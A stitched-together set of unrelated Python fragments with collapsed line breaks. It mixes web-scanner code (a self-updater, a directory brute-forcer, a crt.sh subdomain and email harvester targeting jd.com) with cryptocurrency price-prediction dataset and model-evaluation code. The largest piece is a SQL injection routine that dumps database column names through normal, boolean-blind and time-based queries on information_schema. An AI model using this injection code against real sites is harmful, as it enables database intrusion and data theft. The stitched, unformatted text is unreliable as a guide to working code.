indent=4)
def update(): success = False NewVersion = getLatestRevision() if Version == NewVersion: logger.info("Version:{0} 已经是最新版本".format(Version)) exit(0) elif Version < NewVersion: logger.info("当前版本 Version: {0},最新版本为 Version: {1}".format( Version, NewVersion)) else: logger.info("Version:{0} 已经是最新版本".format(Version)) exit(0) message = input("是否更新?[y/N]") if message == "y": directory = os.path.abspath(BASE_DIR) else: exit(0) try: open(os.path.join(directory, "sWebScanner.py"), "w+b") except Exception as ex: logger.error("无法更新目录的内容 '{0}'".format(ex)) else: for wildcard in ('*', "."): # glob.glob匹配所有的符合条件的文件,并将其以list的形式返回 for _ in glob.glob(os.path.join(directory, wildcard)): try: if os.path.isdir(_): shutil.rmtree(_) else: os.remove(_) except: pass if glob.glob(os.path.join(directory, '*')): errMsg = "无法清除目录的内容 '{0}'".format(directory) logger.error(errMsg) else: try: archive = urllib.request.urlretrieve(ZIPBALL_PAGE)[0] with zipfile.ZipFile(archive) as f: for info in f.infolist(): info.filename = re.sub(r"sWebScanner-main/", "", info.filename) if info.filename: f.extract(info, directory) filepath = os.path.join(BASE_DIR, "config", "config.py") if os.path.isfile(filepath): with open(filepath, 'r', encoding='utf-8') as f: nowVersion = re.search( r"(?m)^Version\s*=\s*['\"]([^'\"]+)", f.read()).group(1) logger.info("更新到最新版本:{0}".format(nowVersion)) os.remove(archive) success = True except Exception as ex: logger.error("抱歉!!!更新无法完成 ('{0}')".format(ex)) if not success: logger.info("请前往Github重新下载") logger.info("下载地址:{0}".format(GIT_REPOSITORY))
def get_columns(self): # 若tables_name未设置,则全跑一遍 if len(self.tables_name) == 0: SqliTables.get_tables(self) # 首先是每个database_name for database_name in self.tables_name: # 每个databases_name声明为一个字典 self.columns_name[database_name] = {} # 每个table_name需要跑一次columns_name for table_name in self.tables_name[database_name]: # 每个table_name中的columns_name声明为一个列表储存 columns_name = [] # 开始跑columns_name logger.debug( "Start sqli databases %s's tables %s's columns..." % (database_name, table_name)) # 先GET if self.sqlirequest == "GET": logger.debug( "The sqlirequest is %s, start sqli columns..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) # 先注columns的数量 columns_number = normal_injection( select='COUNT(*)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) # 每个循环跑一次columns的数据 for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True): # 首先是column name的长度 logger.debug("Start %dth column length sqli..." % (i + 1)) column_name_len = normal_injection( select='length(column_name)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns name column_name = normal_injection( select='column_name', source='information_schema.columns', conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) retVal = build_injection( select="COUNT(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) columns_number = int(retVal) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) for i in range(0, int(columns_number)): # 然后注 columns_number 的 length logger.debug("Start %dth column length sqli..." % (i + 1)) retVal = build_injection( select="length(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) column_name_len = int(retVal) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注column名字 # 清空column_name column_name = "" logger.debug("Start %dth column sqli..." % (i + 1)) for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False): retVal = build_injection( select="ascii(substring(column_name," + repr(j + 1) + ",1))", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) column_name += chr(retVal) logger.debug( "%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) retVal = time_injection( select="COUNT(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) columns_number = int(retVal) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) for i in range(0, int(columns_number)): # 然后注 columns_number 的 length logger.debug("Start %dth column length sqli..." % (i + 1)) retVal = time_injection( select="length(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) column_name_len = int(retVal) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns名字 # 清空column_name column_name = "" logger.debug("Start %dth column sqli..." % (i + 1)) for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False): retVal = time_injection( select="ascii(substring(column_name," + repr(j + 1) + ",1))", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) column_name += chr(retVal) logger.debug( "%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) # 然后是post elif self.sqlirequest == "POST": logger.debug( "The sqlirequest is %s, start sqli tables..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) # 先注columns的数量 columns_number = normal_injection( select='COUNT(*)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) # 每个循环跑一次columns的数据 for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True): # 首先是column name的长度 logger.debug("Start %dth column length sqli..." % (i + 1)) column_name_len = normal_injection( select='length(column_name)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns_name column_name = normal_injection( select='column_name', source='information_schema.columns', conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) retVal = build_injection( select="COUNT(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) columns_number = int(retVal) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) for i in range(0, int(columns_number)): # 然后注 columns_number 的 length logger.debug("Start %dth column length sqli..." % (i + 1)) retVal = build_injection( select="length(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) column_name_len = int(retVal) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns名字 # 清空column_name column_name = "" logger.debug("Start %dth column sqli..." % (i + 1)) for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False): retVal = build_injection( select="ascii(substring(column_name," + repr(j + 1) + ",1))", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) column_name += chr(retVal) logger.debug( "%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) retVal = time_injection( select="COUNT(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) columns_number = int(retVal) logger.debug( "Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) for i in range(0, int(columns_number)): # 然后注 columns_number 的 length logger.debug("Start %dth column length sqli..." % (i + 1)) retVal = time_injection( select="length(column_name)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) column_name_len = int(retVal) logger.debug( "%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns名字 # 清空column_name column_name = "" logger.debug("Start %dth column sqli..." % (i + 1)) for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False): retVal = time_injection( select="ascii(substring(column_name," + repr(j + 1) + ",1))", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) column_name += chr(retVal) logger.debug( "%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) # 把注入得到的columns_name列表转为元组 self.columns_name[database_name][table_name] = tuple( columns_name) logger.info("Sqli result:") # 输出所有的列名 for database_name in self.columns_name: tables_name = "" for table_name in self.columns_name[database_name]: tables_name += table_name tables_name += ',' columns_name = "" for column_name in self.columns_name[database_name][ table_name]: columns_name += column_name columns_name += ',' logger.info("Table %s has columns %s", table_name, columns_name) logger.info("Database %s has tables %s", database_name, tables_name) print "[*]Columns list:", self.columns_name
def info(message): """info log""" log.info(message)
# 迭代我们想要尝试的文件列表 for brute in attempt_list: url = "%s%s" % (target_url, urllib.quote(brute)) # print url try: headers = {} headers["User-Agent"] = conf['ua'] r = urllib2.Request(url, headers=headers) # pbar.update(1) try: response = urllib2.urlopen(r, timeout=2) except: logger.error("Time out...") continue # 有可能卡死 # 请求完成后睡眠 time.sleep(stime) if response.code != 404: logger.info("Get !!!!" + url) tqdm.write("[%d] => %s" % (response.code, url)) except urllib2.URLError, e: if hasattr(e, 'code') and e.code != 404: tqdm.write("!!! %d => %s" % (e.code, url)) logger.info("The dictionary queue is empty") pbar.close() exit(0)
def build(source_index, dest_index, W=10): ohlcv_index = load_preprocessed('ohlcv') cm_index = load_preprocessed('coinmetrics.io') index = {} for _sym in ohlcv_index.keys(): if not _sym in cm_index: logger.warning('Missing blockchain data for {}'.format(_sym)) continue logger.info('Building {}'.format(_sym)) ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) cm = pd.read_csv(cm_index[_sym]['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) # Build resampled OHLCV and TA features ohlcv_3d = builder.periodic_ohlcv_resample(ohlcv, period=3, label=True) ohlcv_7d = builder.periodic_ohlcv_resample(ohlcv, period=7, label=True) ohlcv_30d = builder.periodic_ohlcv_resample(ohlcv, period=30, label=True) ta = builder.features_ta(ohlcv) ta_3d = builder.period_resampled_ta(ohlcv, period=3) ta_7d = builder.period_resampled_ta(ohlcv, period=7) ta_30d = builder.period_resampled_ta(ohlcv, period=30) # Build target percent variation close = ohlcv['close'] target_pct = builder.target_price_variation(ohlcv['close'], periods=1) target_class = builder.target_discrete_price_variation(target_pct) target_binary = builder.target_binary_price_variation(target_pct) target_labels = builder.target_label(target_class, labels=['SELL', 'HOLD', 'BUY']) target_binary_labels = builder.target_label(target_binary, labels=['SELL', 'BUY']) target_bin = builder.target_binned_price_variation(target_pct, n_bins=3) target_bin_binary = builder.target_binned_price_variation(target_pct, n_bins=2) target_bin_labels = builder.target_label( target_bin, labels=['SELL', 'HOLD', 'BUY']) target_bin_binary_labels = builder.target_label(target_bin_binary, labels=['SELL', 'BUY']) # Merge all the datasets dataframes = [ ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d, cm ] #, social_pct] df = pd.concat(dataframes, axis='columns', verify_integrity=True, sort=True, join='inner') target = pd.concat([ close, target_pct, target_class, target_binary, target_bin, target_bin_binary, target_labels, target_binary_labels, target_bin_labels, target_bin_binary_labels ], axis=1) target.columns = [ 'close', 'pct', 'class', 'binary', 'bin', 'binary_bin', 'labels', 'binary_labels', 'bin_labels', 'binary_bin_labels' ] target = target.loc[df.first_valid_index():df.last_valid_index()] # Save resulting dataset both in CSV and Excel format logger.info('Saving {}'.format(_sym)) feature_groups = { 'ohlcv': [c for c in ohlcv.columns], 'ohlcv_3d': [c for c in ohlcv_3d.columns], 'ohlcv_7d': [c for c in ohlcv_7d.columns], 'ohlcv_30d': [c for c in ohlcv_30d.columns], 'ta': [c for c in ta.columns], 'ta_3d': [c for c in ta_3d.columns], 'ta_7d': [c for c in ta_7d.columns], 'ta_30d': [c for c in ta_30d.columns], 'cm': [c for c in cm.columns], # 'social_pct': [c for c in social_pct.columns], } save_symbol_dataset(dest_index, _sym, df, target=target, feature_groups=feature_groups) logger.info('Saved {}'.format(_sym))
def main(): index = load_dataset('all_merged', return_index=True) resultFile = './data/datasets/all_merged/estimators/randomforest_sfm_hyperparameters.json' hyperparameters = {} if not os.path.exists(resultFile): logger.error('no hyperparameters!') with open(resultFile, 'r') as f: hyperparameters = json.load(f) for _sym, data in index.items(): if _sym not in hyperparameters or not os.path.exists( hyperparameters[_sym]['estimator']): logger.error('{} does not exist.'.format(_sym)) else: features = pd.read_csv(data['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) # Replace nan with infinity so that it can later be imputed to a finite value features = features.replace([np.inf, -np.inf], np.nan) #features = features[hyperparameters['feature_importances']] # Derive target classes from closing price target_pct = target_price_variation(features['close']) target = target_binned_price_variation(target_pct, n_bins=2) # target = target_discrete_price_variation(target_pct) # Split data in train and blind test set with 70:30 ratio, # most ML models don't take sequentiality into account, but our pipeline # uses a SimpleImputer with mean strategy, so it's best not to shuffle the data. X_train, X_test, y_train, y_test = train_test_split( features.values, target.values, shuffle=False, test_size=0.3) # Summarize distribution print("Training set: # Features {}, # Samples {}".format( X_train.shape[1], X_train.shape[0])) plot_class_distribution("Training set", _sym, y_train) print("Test set: # Features {}, # Samples {}".format( X_test.shape[1], X_test.shape[0])) plot_class_distribution("Test set", _sym, y_test) if not np.isfinite(X_train).all(): logger.warning("Training x is not finite!") if not np.isfinite(y_train).all(): logger.warning("Training y is not finite!") if not np.isfinite(X_test).all(): logger.warning("Test x is not finite!") if not np.isfinite(y_test).all(): logger.warning("Test y is not finite!") # Take the fitted ensemble with tuned hyperparameters clf = None with open(hyperparameters[_sym]['estimator'], 'rb') as f: clf = pickle.load(f) # Test ensemble's performance on training and test sets logger.info("Classification report on train set") predictions1 = clf.predict(X_train) train_report = classification_report(y_train, predictions1, output_dict=True) print(classification_report(y_train, predictions1)) logger.info("Classification report on test set") predictions2 = clf.predict(X_test) test_report = classification_report(y_test, predictions2, output_dict=True) print(classification_report(y_test, predictions2)) stats = { 'score': accuracy_score(y_train, predictions1), 'mse': mean_squared_error(y_train, predictions1), 'test_score': accuracy_score(y_test, predictions2), 'test_mse': mean_squared_error(y_test, predictions2), 'train_report': train_report, 'test_report': test_report, } print(stats) print("--- end ---")
def build_atsa_dataset(source_index, W=10): _dataset = load_dataset(source_index, return_index=True) index = {} for _sym, entry in _dataset.items(): _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) ohlcv = _df[entry['features']['ohlcv']] ta = _df[entry['features']['ta']] # Build the dataframe with base features ohlc = ohlcv[['open', 'high', 'low', 'close']] lagged_ohlc = pd.concat( [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Add lagged features to the dataframe atsa_df = pd.concat([lagged_ohlc, ta], axis='columns', verify_integrity=True, sort=True, join='inner') # Drop the first 30 rows atsa_df = atsa_df[30:] # Save the dataframe atsa_df.to_csv('data/datasets/all_merged/csv/{}_atsa.csv'.format( _sym.lower()), sep=',', encoding='utf-8', index=True, index_label='Date') atsa_df.to_excel('data/datasets/all_merged/excel/{}_atsa.xlsx'.format( _sym.lower()), index=True, index_label='Date') # decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df) # Add symbol to index index[_sym] = { 'csv': 'data/datasets/all_merged/csv/{}_atsa.csv'.format(_sym.lower()), 'xls': 'data/datasets/all_merged/excel/{}_atsa.xlsx'.format(_sym.lower()), 'target_csv': 'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()), 'target_xls': 'data/datasets/all_merged/excel/{}_target.xlsx'.format( _sym.lower()), 'features': { 'atsa': [c for c in atsa_df.columns], } } logger.info('Saved {} in data/datasets/all_merged/'.format(_sym)) with open('data/datasets/all_merged/index_atsa.json', 'w') as f: json.dump(index, f, sort_keys=True, indent=4)
def run(self): url = self.base_url.format(domain=self.domain) #print url try: self.resp = http_request_get(url).content if self.resp: self.subdomains = self.get_hostnames() self.email = self.get_email() for domain in self.subdomains: self.domain_name.append(domain) except Exception, e: logger.error("Error in {0}: {1}".format( __file__.split('/')[-1], e)) finally: logger.info("{0} found {1} domains".format(self.engine_name, len(self.domain_name))) return self.domain_name, self.smiliar_domain_name, self.email def get_hostnames(self): rawres = parser(self.resp, self.domain) return rawres.hostnames() def get_email(self): rawres = parser(self.resp, self.domain) return rawres.emails() if __name__ == "__main__": x = CrtSearch("jd.com") print x.run()